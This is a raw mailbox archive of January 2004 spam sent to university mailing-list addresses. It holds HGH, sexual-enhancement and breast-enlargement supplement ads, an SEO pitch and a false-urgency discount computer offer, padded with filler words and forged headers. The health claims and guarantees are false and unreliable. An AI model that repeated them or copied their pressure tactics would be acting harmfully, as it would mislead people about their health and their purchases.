Content-Transfer-Encoding: 8bit

<html>conscientious
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#000099" text="#FFFFFF" link="#0000FF" vlink="#0000FF" alink="#0000FF">
<center><h4><font color="#FFFFFF" face="verdana">Bob Hope, JFK, Marilyn Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h4></center><center><h5><font color="#FFFFFF" face="verdana">Long healthy lives full of fun and excitement !<br>And they look SO GOOD at their age !<br>Healthy, young, radiant, slim and trim !<br>  HGH is the answer !<br>HGH replenishes what time takes away !<br>HGH helps them and NOW YOU<br>to "be the best" that you can possibly be !<br>
   
    <br>Ever wonder how certain celebrities manage to look so young and thin at their age??</font></h5>
</center><center><h3><font color="#FFCC00" face="verdana">HGH is the guaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></center><br><center><H3><font color="#FF00FF" face="verdana"><a href="http://www.amyz.info/hgh/?buster">Learn More This way</a></font></h3><br><br><a href="http://www.amyz.info/pher/o.html">Not interested?<br>Please click here</a></center>
binuclear
</body>
</html>


--4682264989981228850--


From 34t@msn.com Mon Jan 12 08:33:04 2004
Return-Path: <34t@msn.com>
Received: from 160.36.58.108 ([24.87.41.143])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0CDX1MN017780;
	Mon, 12 Jan 2004 08:33:02 -0500 (EST)
Received: from [202.217.94.100] by 160.36.58.108 id <2268804-35831>; Mon, 12 Jan 2004 16:29:12 +0300
Message-ID: <x$z0g4$$5$--99t@wk2.o28c>
From: "Weston Maurer" <34t@msn.com>
Reply-To: "Weston Maurer" <34t@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Girls just want to have fun,,,, or is it,,,xxess uvpzrjd  m 
Date: Mon, 12 Jan 04 16:29:12 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="FA_CDDE7__.A.D.57C1_34_"
X-Priority: 3
X-MSMail-Priority: Normal


--FA_CDDE7__.A.D.57C1_34_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

test8

--FA_CDDE7__.A.D.57C1_34_--


From healthstar@msn.com Mon Jan 12 10:07:38 2004
Return-Path: <healthstar@msn.com>
Received: from 160.36.58.108 ([211.212.61.41])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0CF7WMN020500;
	Mon, 12 Jan 2004 10:07:33 -0500 (EST)
Received: from (HELO h8it) [115.177.202.153] by 160.36.58.108 with ESMTP id <925054-72256>; Tue, 13 Jan 2004 22:02:10 +0600
Message-ID: <r1--7-$05-8j165e@m0a.u2f8>
From: "Krista Barber" <healthstar@msn.com>
Reply-To: "Krista Barber" <healthstar@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: .Fantastic, and sexy! mt
Date: Tue, 13 Jan 04 22:02:10 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="8.7_A3_B.B1A.E"
X-Priority: 3
X-MSMail-Priority: Normal


--8.7_A3_B.B1A.E
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>

<body bgcolor=3D"#000000" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><FONT FACE=3D"VERDANA">You can be an ALL NIGHT sex machine !<br>
Finally available to the public !<br>
The secret supplement that's made Male Porn Stars famous !<br>
Make love to her like no other man can<br>
Over and over again All night long!<br>
With multiple orgasms and massive ejaculations!<br>
Porn Stars shoot an entire movie in just ONE DAY having sex
many times<br> with many different women!<br><br>
  ~~~ THOSE GUYS WERE "NOT" BORN THAT WAY ! ~~~<br>
  <br>


Just like the hottest and "IN DEMAND" male stars in the world of Adult Por=
n<br><br>
~~~ YOU TOO WILL BE IN DEMAND ~~~<br><br>
* Increase your testosterone 500% *<br>
* Increase your sex drive---Increase your virility *<br>
* Never again experience premature ejaculation *<br>
* Dramatically increase the amount of semen you ejaculate *<br>


*** Doctor developed with a 100% Money Back Guarantee ! ***<br>
Highly recommended for older men with younger women in their lives !<br>
<a href=3D"http://www.corkz.info/alpha/?buster"><h4>For Fantastic sex Clic=
k here!</h4></a><br><br><br>


<a href=3D"http://www.corkz.info/pher/o.html">Not interested?<br> Please C=
lick here</a></FONT></center>
nickname
</body>
</html>

--8.7_A3_B.B1A.E--


From wtsyawfjzz@msn.com Mon Jan 12 19:42:14 2004
Return-Path: <wtsyawfjzz@msn.com>
Received: from MANIA-36 ([61.37.73.236])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0D0gBMN005070;
	Mon, 12 Jan 2004 19:42:12 -0500 (EST)
Received: from (HELO qza0afa) [48.56.225.37] by MANIA-36 with ESMTP id 52409917; Tue, 13 Jan 2004 14:39:33 +0000
Message-ID: <18y4b0v5wdud$614@ce0l.yw>
From: "Basil Kim" <wtsyawfjzz@msn.com>
Reply-To: "Basil Kim" <wtsyawfjzz@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Quick impess her,,-egypt hhzxvgbxlwmypdnd i
Date: Tue, 13 Jan 04 14:39:33 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="CA.5D9_698B_BA"
X-Priority: 3
X-MSMail-Priority: Normal


--CA.5D9_698B_BA
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>latin
<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be an ALL NIG=
HT sex machine !</font></h3></center><center><h4><font color=3D"#FF00FF" f=
ace=3D"verdana">Finally available to the public<br>The supplement that's m=
ade Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>With multiple orgasms a=
nd massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many =
times with many different women!<br><br><CENTER><h5><font color=3D"#FF00FF=
" face=3D"verdana">THOSE GUYS WEREN'T BORN THAT WAY!</font></H5></CENTER><=
br>
    Now you too can have incredible multiple orgasmic sex over and over ag=
ain<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF00FF" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#FFFFFF" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5>
    <h2><a href=3D"http://www.corkz.info/alpha/?buster">For Fantastic sex =
Click here!</a></h2></center>
	<br><center><a href=3D"http://www.corkz.info/pher/o.html">Not interested?=
 Please Click here</a></center>
roundhead
</body>
</html>

--CA.5D9_698B_BA--


From fmbr2qugq@hotmail.com Mon Jan 12 20:44:07 2004
Return-Path: <fmbr2qugq@hotmail.com>
Received: from 160.36.58.108 ([61.183.126.114])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0D1i0MN006074;
	Mon, 12 Jan 2004 20:44:01 -0500 (EST)
Received: from [48.139.28.47] by 160.36.58.108; Tue, 13 Jan 2004 20:36:04 +0500
Message-ID: <g7-3-h$7$2pe58-$8j2p$3w4kt1uj9a@sh9ma9wr>
From: "Forest Law" <fmbr2qugq@hotmail.com>
Reply-To: "Forest Law" <fmbr2qugq@hotmail.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Improve.. your cup sizes! Medically proven! o oy ov
Date: Tue, 13 Jan 04 20:36:04 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F8.2E1.F.C861_CBF.0FC8D5"
X-Priority: 3
X-MSMail-Priority: Normal


--F8.2E1.F.C861_CBF.0FC8D5
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.jonnyz.us/breast/?buster=
">This way to a new figure safely!</a></H2><br>
<a href=3D"http://www.jonnyz.us/pher/o.html ">Not interested?<br>Please cl=
ick here</a>
</center>
miasmal
</body>
</html>

--F8.2E1.F.C861_CBF.0FC8D5--


From nuu9@yahoo.com Mon Jan 12 22:26:33 2004
Return-Path: <nuu9@yahoo.com>
Received: from islandtelecom249-186.islandtelecom.com (islandtelecom249-186.islandtelecom.com [142.177.249.186])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0D3QVMN007654;
	Mon, 12 Jan 2004 22:26:32 -0500 (EST)
Received: from (HELO 5ph) [221.93.152.20] by islandtelecom249-186.islandtelecom.com SMTP id jltN4HMTggvcdP; Tue, 13 Jan 2004 03:16:41 +0000
Message-ID: <bgri4-wqr4up-$85o@rzg9ec7>
From: "Tommie Lamb" <nuu9@yahoo.com>
Reply-To: "Tommie Lamb" <nuu9@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Anybody can do it, can you do it fantastic? ae 
Date: Tue, 13 Jan 04 03:16:41 GMT
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="2_C.._C7BC...30A"
X-Priority: 3
X-MSMail-Priority: Normal


--2_C.._C7BC...30A
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

test6

--2_C.._C7BC...30A--


From info3@ecom-universe.net Tue Jan 13 00:01:06 2004
Return-Path: <info3@ecom-universe.net>
Received: from c-24-15-48-247.client.comcast.net (c-24-15-48-247.client.comcast.net [24.15.48.247])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0D50kMN009065;
	Tue, 13 Jan 2004 00:01:04 -0500 (EST)
Received: from [234.20.109.46] by c-24-15-48-247.client.comcast.net; Tue, 13 Jan 2004 04:52:05 +0000
Message-ID: <qwaa-b849-$190u11p5jk@4o2e65wd.5lzf>
From: "sales" <info3@ecom-universe.net>
Reply-To: "sales" <info3@ecom-universe.net>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>
Subject: Your Position is confirmed.... sqyexosmk adgza
Date: Tue, 13 Jan 04 04:52:05 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="16E_D9..8.E10.5_."
X-Priority: 3
X-MSMail-Priority: Normal


--16E_D9..8.E10.5_.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>

<head>
<meta http-equiv=3D"Content-Language" content=3D"en-us">
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
1252">
<META name=3D"GENERATOR" content=3D"IBM NetObjects TopPage V4.0.3  for Win=
dows">
<meta name=3D"ProgId" content=3D"FrontPage.Editor.Document">
<title>Is your website in the top 20 listings</title>
</head>

<body BACKGROUND=3D"images/back.gif" BGCOLOR=3D"#FFFFFF" MARGINHEIGHT=3D"0=
" MARGINWIDTH=3D"0" TOPMARGIN=3D"0" LEFTMARGIN=3D"0" RIGHTMARGIN=3D"0">


 <CENTER><table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"=
*">
    <tr>
      <td VALIGN=3DTOP><a href=3D"http://www.marketingbooster.com">
      <IMG SRC=3D"http://www.marketingbooster.com/images/head.jpg"
WIDTH=3D=
"255" HEIGHT=3D"260" BORDER=3D"0"></a></td>
      <td VALIGN=3DTOP><a href=3D"http://www.marketingbooster.com">
      <IMG SRC=3D"http://www.marketingbooster.com/images/text.gif"
WIDTH=3D=
"445" HEIGHT=3D"260" BORDER=3D"0"></a></td>
    </tr>
    <tr>
      <td VALIGN=3DTOP><a href=3D"http://www.marketingbooster.com">
      <IMG SRC=3D"http://www.marketingbooster.com/images/middle.jpg" WIDTH=
=3D"255" HEIGHT=3D"36" BORDER=3D"0"></a></td>
      <td VALIGN=3DTOP><a href=3D"http://www.marketingbooster.com">
      <IMG SRC=3D"http://www.marketingbooster.com/images/engines.gif" WIDT=
H=3D"445" HEIGHT=3D"36" BORDER=3D"0"></a></td>
    </tr>
    <tr>
      <td VALIGN=3DTOP><a href=3D"http://www.marketingbooster.com">
      <IMG SRC=3D"http://www.marketingbooster.com/images/feet.jpg"
WIDTH=3D=
"255" HEIGHT=3D"130" BORDER=3D"0"></a><P>
      <form method=3D"POST" action=3D"../cgi-bin/get_started2.cgi">
                    <CENTER><table border=3D"0" cellspacing=3D"0" width=3D=
"*">
                      <tr>
                        <td>
                  &nbsp;</td>
                      </tr>
                    </table></CENTER>
                </form></td>
      <td VALIGN=3DTOP>&nbsp;<P>
      <p>&nbsp;</p>
      <CENTER>
                    <table border=3D"0" cellspacing=3D"0" width=3D"355">
                      <tr>
                        <td>
                        <p align=3D"center">
                        <a href=3D"http://www.marketingbooster.com">
                        <font size=3D"4">Click Here for your FREE web site=
 
                        analysis!</font></a></td>
    </tr></TABLE></CENTER></td>
    </tr></TABLE></CENTER>
<P><BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
To be taken off our mailling list <A href=3D"http://www.marketingbooster.c=
om/remove.html">click here.</A><BR>
<BR>
<BR>
<BR>
<BR>
EZR 2052 newport blvd. suite #6, po box 36
costa mesa ca 92627<BR>
</P>
</body>

</html>wngi

--16E_D9..8.E10.5_.--


From gqvlwsemo@hotmail.com Tue Jan 13 05:42:07 2004
Return-Path: <gqvlwsemo@hotmail.com>
Received: from pool-141-151-76-90.phil.east.verizon.net (pool-141-151-76-90.phil.east.verizon.net [141.151.76.90])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0DAg5MN020639;
	Tue, 13 Jan 2004 05:42:06 -0500 (EST)
Received: from [76.192.88.99] by 141.151.76.90 with HTTP;
	Wed, 14 Jan 2004 02:37:10 +0200
From: "Goldie Cotton" <zukdxnqu@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: blast-lb-archive@netlib2.cs.utk.edu, blast-lite-archive@netlib2.cs.utk.edu,
   blast-sparse-archive@netlib2.cs.utk.edu
Subject: Ladies Safe Breast makeover !!
Mime-Version: 1.0
X-Mailer: hayward tomb 
Date: Tue, 13 Jan 2004 23:38:10 -0100
Reply-To: "Goldie Cotton" <gckrymivod@yahoo.com>
Content-Type: multipart/alternative;
	boundary="392613668099320563"
Message-Id: <OTWYAUT-0008691896501@anselmo>

--392613668099320563
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit

chuff adequacy equitable imprudent paternoster paddy wolves 
colleague famous b incantation montreal 
pleasant contend caruso pensacola earthy omit deodorant lathrop mobil 
river nicotinamide vaughan predominate carabao goof arbitrate eh bloodshed burl 
gerald ordeal barbara bauhaus let firehouse 
weeks prefix stead intensive barstow ethnic 

--392613668099320563
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 8bit

<html>updraft
<body bgcolor="#000099" text="#00FFFF" link="#FFFFFF" alink="#FFFFFF" vlink="#FFFFFF">
<center>
<H3>Ladies<br>Firm and enlarge your breasts safely and naturally !<br>Doctor approved 100% guaranteed !
</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
  Improve Breast size and firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for 
thousands of positive results in Europe <br>Hundreds of thousands of women are
 already enjoying ASTOUNDING results! <br>
    <br><H2>100% Satisfaction Guaranteed!<br>
    Doctor Approved!<br>We're so impressed with this product<br> 
    that we gladly offer a 100% Money Back Guarantee <br>
    There's nothing to lose!</H2></center><br><center><h2>
    <a href="http://www.corkz.info/breast/?buster">This way to a new figure safely!</a></H2><br>
    <br><a href="http://www.corkz.info/pher/o.html">Not interested? Please Click here</a></center>

</body>
</html>


--392613668099320563--

From vvq1baj@juno.com Tue Jan 13 07:24:51 2004
Return-Path: <vvq1baj@juno.com>
Received: from cs17026-42.jam.rr.com (cs17026-42.jam.rr.com [24.170.26.42])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0DCOoMN022805;
	Tue, 13 Jan 2004 07:24:51 -0500 (EST)
Received: from [213.9.67.28] by cs17026-42.jam.rr.com id dqVM60t874b1; Wed, 14 Jan 2004 04:20:48 +0200
Message-ID: <9kvh$7705g$uau6-8f18q@fr9n.7sy>
From: "Joseph Norris" <vvq1baj@juno.com>
Reply-To: "Joseph Norris" <vvq1baj@juno.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ''Larger cup sizes ! Proven effective! hzfwuts n 
Date: Wed, 14 Jan 04 04:20:48 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_BF.C_1DE.._B_EF_3F"
X-Priority: 3
X-MSMail-Priority: Normal


--_BF.C_1DE.._B_EF_3F
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.hgee1.info/breast/?buste=
r">This way to a new figure safely!</a></H2><br>
<a href=3D"http://www.hgee1.info/pher/o.html ">Not interested?<br>Please c=
lick here</a>
</center>
tinder
</body>
</html>

--_BF.C_1DE.._B_EF_3F--


From dm60brkk@hotmail.com Tue Jan 13 08:02:36 2004
Return-Path: <dm60brkk@hotmail.com>
Received: from 82-37-7-252.cable.ubr01.wolv.blueyonder.co.uk (82-37-7-252.cable.ubr01.wolv.blueyonder.co.uk [82.37.7.252])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0DD2WMN023625;
	Tue, 13 Jan 2004 08:02:33 -0500 (EST)
Received: from [148.204.212.102] by 82-37-7-252.cable.ubr01.wolv.blueyonder.co.uk with ESMTP id <607015-59007>; Tue, 13 Jan 2004 11:53:42 -0100
Message-ID: <5-m8n5t2y30-l2@c7wzg7yo.3iu>
From: "Roderick Dalton" <dm60brkk@hotmail.com>
Reply-To: "Roderick Dalton" <dm60brkk@hotmail.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: (Eks-Eks-Eks) movie stars  Ceecrut to fame ! enk mwrx  pn
Date: Tue, 13 Jan 04 11:53:42 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_E49A35.4367.0"
X-Priority: 3
X-MSMail-Priority: Normal


--_E49A35.4367.0
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be an ALL NIG=
HT sex machine !</font></h3></center><center><h4><font color=3D"#FF00FF" f=
ace=3D"verdana">Finally available to the public<br>The supplement that's m=
ade Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>With multiple orgasms a=
nd massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many =
times with many different women!<br><br><CENTER><h5><font color=3D"#FF00FF=
" face=3D"verdana">THEY WEREN'T BORN THAT WAY!</font></H5></CENTER>
    Now you too can have incredible multiple orgasmic sex over and over ag=
ain<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF00FF" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#FFFFFF" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.amyz.info/alpha/?buster">For Fantastic sex Click her=
e!</a></h2></center>
	<br><center><a href=3D"http://www.amyz.info/pher/o.html">Not interested? =
Please Click here</a></center>
offprint<br>hmprqdyf qw ficugdcsjm ockpciuj  pufcxprdj
lxm anif
i
</body>
</html>

--_E49A35.4367.0--


From Administration@techadvice.org Tue Jan 13 08:51:15 2004
Return-Path: <Administration@techadvice.org>
Received: from 200-207-1-240.america-net.com.br (200-207-1-240.america-net.com.br [200.207.1.240] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0DDonMN025173;
	Tue, 13 Jan 2004 08:51:04 -0500 (EST)
Received: from yd6ck.oanfqs.com [160.191.82.134] by 200-207-1-240.america-net.com.br SMTP id 6J9OpX1KQA3JGs; Tue, 13 Jan 2004 12:44:25 -0100
Message-ID: <480799m9-81nd879335@d224fsm.o277i>
From: "Admin" <Administration@techadvice.org>
To: -funct-archive@netlib2.cs.utk.edu
Subject: ADV:         Attention:  All Insurance Professionals, Employees and Personnel:
Date: Tue, 13 Jan 04 12:44:25 GMT
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".5AFD.EDDC.20EDCCA3"

This is a multi-part message in MIME format.

--.5AFD.EDDC.20EDCCA3
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Attention All Insurance Professionals, Employees and Personnel:

You Must Respond By 5 P.M. Wednesday, January 14, 2004.

Through a special arrangement, Avtech Direct is offering a limited
allotment of BRAND NEW, top of-the-line, name-brand desktop computers
at 50% off MSRP to all Insurance Employees and Personnel who
respond to this message before 5 P.M., Wednesday, January 14, 2004.

All desktop computers are brand-new packed in their original boxes,
and come with a full manufacturer's warranty plus
a 100% satisfaction guarantee.

These professional grade Desktops are fully equipped with 2004
next generation technology, making these the best performing
computers money can buy.

Avtech Direct is offering these feature rich, top performing
Desktops with the latest Intel technology at an amazing price
to all Insurance Employees and Personnel who call:

    1-800-884-9510 by 5 P.M. Wednesday, January 14, 2004

The fast and powerful AT-2400 series Desktop features: 

      * Intel 2.0Ghz Processor for amazing speed and performance
      * 128MB DDR RAM,  Upgradeable to 1024
      * 20 GB UDMA Hard Drive, Upgradeable to 80 GB
      * 52X CD-Rom Drive, Upgradeable to DVD/CDRW 
      * 1.44 Floppy disk drive
      * Next Generation Technology
      * ATI Premium video and sound
      * Full Connectivity with Fax modem/Lan/IEE 1394/USB 2.0
      * Soft Touch Keyboard and scroll mouse
      * Internet Ready
      * Network Ready
      * 1 Year parts and labor warranty
      * Priority customer service and tech support

MSRP $699 ........................................ Your Cost $347

How to qualify:

  1. You must be a Insurance Professional or Employee
  2. All desktop computers will be available on a
     first come first serve basis.
  3. You must call 1-800-884-9510 by 5 P.M. Wednesday, January 14, 2004
     and we will hold the desktops you request on will call. 
  4. You are not obligated in any way.
  5. 100% Satisfaction Guaranteed.
   
   
Call Avtech Direct
1-800-884-9510 before 5 P.M. Wednesday, January 14, 2004




If you received this message in error or wish to be removed, 
please go to http://www.techadvice.org/remove.htm
--.5AFD.EDDC.20EDCCA3--


From ozdnfb096@hotmail.com Tue Jan 13 10:10:46 2004
Return-Path: <ozdnfb096@hotmail.com>
Received: from user-0c90jmn.cable.mindspring.com (user-0c90jmn.cable.mindspring.com [24.144.78.215])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0DFAjMN029906;
	Tue, 13 Jan 2004 10:10:46 -0500 (EST)
Received: from [130.56.73.227] by user-0c90jmn.cable.mindspring.com id vWbwv22l2pL9; Wed, 14 Jan 2004 11:06:19 -0500
Message-ID: <5iz4xwr0l8sp1$$2ur$j-ca$kj1$00@w97f.ah>
From: "Vernon Morales" <ozdnfb096@hotmail.com>
Reply-To: "Vernon Morales" <ozdnfb096@hotmail.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Male X'X'X' stars thankful for this ! zyf
Date: Wed, 14 Jan 04 11:06:19 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="BCD__8A0_0119D"
X-Priority: 3
X-MSMail-Priority: Normal


--BCD__8A0_0119D
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>

<body bgcolor=3D"#000000" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><FONT FACE=3D"VERDANA">You can be an ALL NIGHT sex machine !<br>
Finally available to the public !<br>
The secret supplement that's made Male Porn Stars famous !<br>
Make love to her like no other man can<br>
Over and over again All night long!<br>
With multiple orgasms and massive ejaculations!<br>
Porn Stars shoot an entire movie in just ONE DAY having sex
many times<br> with many different women!<br><br>
  ~~~ THOSE GUYS WERE "NOT" BORN THAT WAY ! ~~~<br>
  <br>


Just like the hottest and "IN DEMAND" male stars in the world of Adult Por=
n<br><br>
~~~ YOU TOO WILL BE IN DEMAND ~~~<br><br>
* Increase your testosterone 500% *<br>
* Increase your sex drive---Increase your virility *<br>
* Never again experience premature ejaculation *<br>
* Dramatically increase the amount of semen you ejaculate *<br>


*** Doctor developed with a 100% Money Back Guarantee ! ***<br>
Highly recommended for older men with younger women in their lives !<br>
<a href=3D"http://www.jonnyz.us/alpha/?buster"><h4>For Fantastic sex Click=
 here!</h4></a><br><br><br>


<a href=3D"http://www.jonnyz.us/pher/o.html">Not interested?<br> Please Cl=
ick here</a></FONT></center>
censure
</body>
</html>

--BCD__8A0_0119D--


From wugmxcrd@bellnexxia.com Tue Jan 13 16:25:16 2004
Return-Path: <wugmxcrd@bellnexxia.com>
Received: from 66-108-153-112.nyc.rr.com (66-108-153-112.nyc.rr.com [66.108.153.112])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0DLPFMN006643;
	Tue, 13 Jan 2004 16:25:16 -0500 (EST)
